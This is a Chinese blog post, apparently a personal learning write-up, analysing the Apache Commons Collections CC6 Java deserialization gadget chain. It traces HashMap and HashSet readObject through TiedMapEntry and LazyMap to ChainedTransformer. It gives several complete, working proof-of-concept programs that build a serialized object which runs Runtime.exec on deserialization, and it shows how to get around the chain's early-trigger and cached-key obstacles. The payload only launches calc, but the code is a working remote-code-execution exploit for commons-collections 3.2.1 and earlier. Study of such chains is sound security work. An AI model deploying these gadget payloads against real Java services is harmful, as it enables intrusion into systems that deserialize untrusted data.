CC6分析与利用超详细

最新推荐文章于 2024-07-11 18:01:55 发布
最新推荐文章于 2024-07-11 18:01:55 发布
阅读量1.1k 收藏 23
点赞数 12
文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79700060/article/details/140054861
版权

CC链6的分析与利用

经过之前对CC1链和URLDNS链的分析,感觉自己对反序列化也有了个比较清晰的认知。分析了这两条链子后就该分析CC6了,这条链子不受jdk的版本影响,并且只要commons collections 小于等于3.2.1,都存在这个漏洞。

链子分析

变化

相比之前的CC1,在jdk8u_71之后,AnnotationInvocationHandler类被重写了,修改了readObject方法,里面没有了setValue方法。

下面是 jdk_17.0.11 版本的AnnotationInvocationHandler类中的readObject方法:

QQ截图20240624134613

可以看到没有了setValue方法的调用,那么似乎就没办法利用CC1中的TransforMap链了。那利用另一条呢?

先把LazyMap调用get方法的构造写出来(参考CC1的补充)

package org.example;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import java.util.HashMap;
import java.util.Map;

public class CC6test {
    public static void main(String[] args)throws Exception {

        InvokerTransformer t = new InvokerTransformer("exec", new Class[]{String.class}, new String[]{"calc"});
        HashMap<Object,Object> map = new HashMap<>();
        Map<Object,Object> Lazy = LazyMap.decorate(map,t);
        Lazy.get(Runtime.getRuntime());
        }
    }

QQ截图20240624145303

如果像之前一样接着LazyMap继续向上看,确实依然能发现invoke中还是调用了get方法,并且参数memberValues可控,但是下面readObject方法中的for循环,调用的参数不可控了,没法让其代理对象调用方法就没法到Handler的invoke方法了。

QQ截图20240624195401

所以这里链子得另外找了,不过还是能继承到CC1的一些东西,直接从LazyMap.get向上找。

HashMap链

TiedMapEntry.getValue()

发现TiedMapEntry.java中的getValue调用了get方法,跟进看看参数map可以控制不。

QQ截图20240624203103

可以通过构造函数进行控制

QQ截图20240624203243

那么接下来就需要找谁调用了getValue方法,发现就在这个类里面的hashCode调用了getValue方法。

TiedMapEntry.hashCode()

QQ截图20240624213830

简单测试构造:

package org.example;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;

public class CC6test {
    public static void main(String[] args)throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}),
        };
        ChainedTransformer cha = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        Map<Object, Object> Lazy = LazyMap.decorate(map,cha);

        TiedMapEntry Tie=new TiedMapEntry(Lazy,"aaa");
        Tie.hashCode();
    }
}

QQ截图20240624214255

HashMap.hash()

接下来该干什么就不用多说了,因为还没到readObject,所以还得继续找谁调用了hashCode()方法,不过这个hashCode方法在之前的URLDNS链中也有用过,是在HashMap中的hash()方法进行的调用,到这里就可以直接借用前面的URLDNS了,URLDNS链是:

    Gadget Chain:
      HashMap.readObject()
          HashMap.hash()
            URL.hashCode()

直接能够到了readObject,这里把最后就只用调用TiedMapEntry类的hashCode方法就行了。链子就变为了:

    Gadget Chain:
      HashMap.readObject()
          HashMap.hash()
            TiedMapEntry.hashCode()
            	TiedMapEntry.getValue()
            		LazyMap.get()
            			ChainedTransformer.transform()
            				...
put方法提前调用解决

不过这里也会出现另一个问题,在HashMap中的readObject的key值是通过HashMap.put进行赋值的,但在调用HashMap.put的时候也会触发到hashCode()方法,导致反序列化失败。

QQ截图20240624220935

而且这里不像URL.hashCode可以通过反射修改hashCode的值来避免,这里是直接就调用了没有条件,所以得另想它法了。

那么可以在put的时候传个其他的Transformer对象,这样到最后就是调用的其他对象的transform方法了,然后再利用反射把factory参数改为ChainedTransformer,这样再反序列化的时候就可以调用到ChainedTransformer的transform方法了。

构造:

package org.example;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.Map;


public class CC6test {
    public static void main(String[] args)throws Exception {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}),
        };
        
        ChainedTransformer cha = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        Map<Object, Object> Lazy = LazyMap.decorate(map,new ConstantTransformer(1));

        TiedMapEntry Tie=new TiedMapEntry(Lazy,"aaa");
        HashMap<Object,Object> hashmap = new HashMap<>();
        hashmap.put(Tie,"gaoren");
        
        Class<LazyMap> lazyMapClass = LazyMap.class;
        Field factoryField = lazyMapClass.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(Lazy, cha);

        serilize(hashmap);
        deserilize("ser.bin");
    }
    public static void serilize(Object obj)throws IOException {
        ObjectOutputStream out=new ObjectOutputStream(new FileOutputStream("ser.bin"));
        out.writeObject(obj);
    }
    public static Object deserilize(String Filename)throws IOException,ClassNotFoundException{
        ObjectInputStream in=new ObjectInputStream(new FileInputStream(Filename));
        Object obj=in.readObject();
        return obj;
    }
}

不过最后能运行但是没弹计算机。

get方法的问题解决

关键地方在get方法中:

QQ截图20240624224235

调试发现再第一次调用put到get方法时,会先进行一个if判断就看Map中是否包含了key值,没有就能成功执行到transform方法,但是看到下面还有一句map.put(key, value),会把没有的key值put进Map中。

QQ截图20240625144015

这就导致了后面再反序列化的侯,再次到达这个if的时候就会因为Map中有key值而无法执行transform方法,不过这个可以像上面的Transformer一样,再put方法后反射调用修改key值或者直接删除Map中的key值。

最后poc:

package org.example;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;

public class CC6test {
    public static void main(String[] args)throws Exception {

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}),
        };

        ChainedTransformer cha = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        Map<Object, Object> Lazy = LazyMap.decorate(map,new ConstantTransformer(1));

        TiedMapEntry Tie=new TiedMapEntry(Lazy,"aaa");
        HashMap<Object,Object> hashmap = new HashMap<>();
        hashmap.put(Tie,"gaoren");

        Class<LazyMap> lazyMapClass = LazyMap.class;
        Field factoryField = lazyMapClass.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(Lazy, cha);

        Lazy.remove("aaa");
//        Object o=new Object();
//        Class<TiedMapEntry> tie = TiedMapEntry.class;
//        Field field = tie.getDeclaredField("key");
//        Field modifiersField = Field.class.getDeclaredField("modifiers");
//        modifiersField.setAccessible(true);
//        modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
//        field.setAccessible(true);
//        field.set(Tie,"aaaaaaaa");

        serilize(hashmap);
        deserilize("111.bin");
    }
    public static void serilize(Object obj)throws IOException {
        ObjectOutputStream out=new ObjectOutputStream(new FileOutputStream("111.bin"));
        out.writeObject(obj);
    }
    public static Object deserilize(String Filename)throws IOException,ClassNotFoundException{
        ObjectInputStream in=new ObjectInputStream(new FileInputStream(Filename));
        Object obj=in.readObject();
        return obj;
    }
}

HashSet链

HashSet.readObject()

hashset中的readObject方法在最后会触发put,剩下的就不用说了,put就会上面说的put一样了,最后可以触发到hashcode方法:

QQ截图20240625151017

但是这里需要吧e变为TiedMapEntry对象,这样才能触发到TiedMapEntry的hashcode方法。

在HashSet中提供了add方法,可以利用add对e赋值

QQ截图20240625151853

poc:

package org.example;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;

public class CC6test {
    public static void main(String[] args)throws Exception {

        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"}),
        };

        ChainedTransformer cha = new ChainedTransformer(transformers);
        HashMap<Object, Object> map = new HashMap<>();
        Map<Object, Object> Lazy = LazyMap.decorate(map,new ConstantTransformer(1));


        TiedMapEntry Tie=new TiedMapEntry(Lazy,"aaa");
        HashSet set=new HashSet();
        set.add(Tie);

        Class<LazyMap> lazyMapClass = LazyMap.class;
        Field factoryField = lazyMapClass.getDeclaredField("factory");
        factoryField.setAccessible(true);
        factoryField.set(Lazy, cha);

        Lazy.remove("aaa");
//        Object o=new Object();
//        Class<TiedMapEntry> tie = TiedMapEntry.class;
//        Field field = tie.getDeclaredField("key");
//        Field modifiersField = Field.class.getDeclaredField("modifiers");
//        modifiersField.setAccessible(true);
//        modifiersField.setInt(field, field.getModifiers() & ~Modifier.FINAL);
//        field.setAccessible(true);
//        field.set(Tie,"aaaaaaaa");

        serilize(set);
        deserilize("111.bin");
    }
    public static void serilize(Object obj)throws IOException {
        ObjectOutputStream out=new ObjectOutputStream(new FileOutputStream("111.bin"));
        out.writeObject(obj);
    }
    public static Object deserilize(String Filename)throws IOException,ClassNotFoundException{
        ObjectInputStream in=new ObjectInputStream(new FileInputStream(Filename));
        Object obj=in.readObject();
        return obj;
    }
}

番外

在一开始调试CC6的时候,为了对比其和CC1的区别,我把jdk版本改为了jdku71然后下载sun包源码,直接把CC1的LazyMap链复制过去。

运行:

QQ截图20240625152727

报错没什么好说的。

断点调试:

QQ截图20240625152854

?怎么给我跳了三个计算机,在invoke方法打上断点发现竟然还能触发invoke方法,后面把序列化去掉后还是弹三个计算机,反正捣鼓了很久,最后在b站白日梦组长CC6评论区破案,是IDEA调试器问题,关掉下面两个就好了。

参考:https://blog.csdn.net/lkforce/article/details/90479650

QQ截图20240625153255

gaorenyusi
关注
  • 12
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CommonsCollections6利用链分析
m0_61506558的博客
11-28 434
(一)利用链(一)利用链可以看到,CC6链从LazyMap类开始的后半部分和CC1链是相同的,只是前面没有使用类readObject()的作为反序列化的入口了,从而解决了在java 8u71 版本之后无法使用CC1链的问题。CC6链的前半部分和URLDNS链比较像,都是利用了HashMap类在计算hash值时调用的方式,进入到方法,再到的。(二)代码分析
cc6
lylong0703的博客
02-12 2783
cc6
CC6链分析
sunyufei_666的博客
08-03 105
CC1链使用了AnnotationInvocationHandler类来利用,但是高版本的JDK已修复这个漏洞,现在必须找通过TransformedMap类或者LazyMap类来触发漏洞。在CC1中,可以通过LazyMap中的get方法调用transform方法,现在需要再找一个调用get方法的的地方,这里可以看TiedMapEntry类。TiedMapEntry类中的hashcode方法也调用了getValue()方法。这里和URLDNS链很像,因为HashMap的put方法里面会调用hash方法。
CC6利用链分析
最新发布
07-11 1071
CC1的两条利用链,在JDK 8u71之后已修复,不可利用。学一下不受版本限制的CC6利用链。
CC6链子
..
10-27 819
因为JDK8u71后,Java 官方修改了 sun.reflect.annotation.AnnotationInvocationHandler 的readObject函数++ Class
学英文视频播放器 flash cc6 as2 编辑
03-04
压缩包内两个flash的EXE文件(分别横屏、竖屏...播放器使用flash cc6 As2编辑。 允许用户添加视频,修改或创建 xml 格式索引文件,供播放器选择加载。 XML文件的格式、编辑修改方法在压缩包的“注释”中有详细描述。
phonegap-phonegap-1.0.0-0-g80cc6dd.zip
09-21
PhoneGap的核心理念是利用Web技术来实现原生移动应用的功能,它通过一个桥接机制,使得JavaScript可以调用设备的原生API,如摄像头、GPS、加速计等。这种开发方式极大地降低了开发多平台应用的门槛,因为开发者只...
9a3b2ddcf0cc6f43d099
03-19
自述文件 该自述文件通常会记录启动和运行应用程序所需的所有步骤。 您可能要讲的内容: Ruby版本 系统依赖 配置 数据库创建 数据库初始化 如何运行测试套件 服务(作业队列,缓存服务器,搜索引擎等) ...
窃密者Facefish分析报告.docx
05-16
Rootkit 工作在 Ring3 层,利用 LD_PRELOAD 特性加载,通过 Hook ssh/sshd 程序的相关函数以窃取用户的登录凭证,同时它还支持一些后门功能。 Facefish 使用了 Blowfish 加密算法来保护其通信,且使用 Diffie-...
CC6开发应用教材基础篇
08-25
在第二章中,作者详细阐述了2D与3D的概念,并解析了如何描述3D世界,包括空间位置、视觉效果和运动状态。 LYINUX是本书的重点,它是基于Linux的操作系统,广泛应用于3D场景构建。书中提到,LYINUX不仅在游戏、教育...
CC6链分析与复现
weixin_42974824的博客
08-18 681
CC6链分析与复现
Java反序列化漏洞-CC6利用链分析
柠檬i的博客
12-26 1367
经过之前对[CC1链]的分析,现在已经对反序列化利用链有了初步的认识,这次来分析一个最好用的CC利用链——CC6。 为什么CC6是最好用的CC利用链,因为CC6不限制jdk版本,只要commons collections 小于等于3.2.1,都存在这个漏洞。
CommonCollections6链分析
Demodd的博客
03-20 4208
前言 ​ 本文参考b站白日梦组长仅做笔记记录,完全跟着他复现,大家可以参考他的视频学习。 Gadget分析 因为只看了cc1可以说cc6利用的是cc1的前半部分,一直到LazyMap.decorate Transformer[] transformers = new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer("get
Java安全 CC链6分析
Elite的博客
02-14 1317
CC链6不受jdk版本与cs版本的影响,在Java安全中最为通用,并且非常简洁,非常有学习的必要,建议在学习CC链6之前先学习一下 URLDNS链 和 CC链1(LazyMap类)
[Java反序列化]Javacc链6分析
Y4tacker的博客
06-02 1218
文章目录写在前面GadgetsJavaCC链6分析利用链参考文章 写在前面 感觉看完了cc链1以后cc链6就突然变得很简单了(来自P神的简化链,这里我修改了一丢丢),那么就开始学习了 Gadgets /* Gadget chain: java.io.ObjectInputStream.readObject() java.util.HashMap.readObject() java.util.HashMap.hash() org.apache.commons.collections.k
java反序列化 cc链6 分析
m0_64815693的博客
04-22 1084
java反序列化 cc链6 分析
Java安全 反序列化(5) CC6链原理分析
qq_39947980的博客
03-22 1430
CC6学习的目的在于其可以无视jdk版本,这条链子更像CC1-LazyMap和URLDNS链子的缝合版,上篇文章我们通过方法实现的链式调用但是我们再次依赖了作为我们反序列化后的入口类在JDK 8u71以后开发者重写了使我们依赖调用和实现ChaindeTransformer.transform()方法失效如何让调用执行任意命令可以无视JDK版本?我们知道URLDNS链具有普遍性,我们可以同样通过HashMap实现入口类吗?通过自动调用hashcode方法最终实现的链式调用。
cc6分析
Sk1y的博客
04-12 689
cc6分析 文章目录cc6分析调用链由后至前分析TiedMapEntryHashMap反射给lazyMap对象赋值关于put方法的理解遇到的一点点问题exp参考链接 HashMap.readObject 调用链 HaspMap.readObject.hash() -->TiedMapEntry.hashCode() -->TiedMapEntry.getValue() -->LazyMap.get() -->ChainedTransformer.transform
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值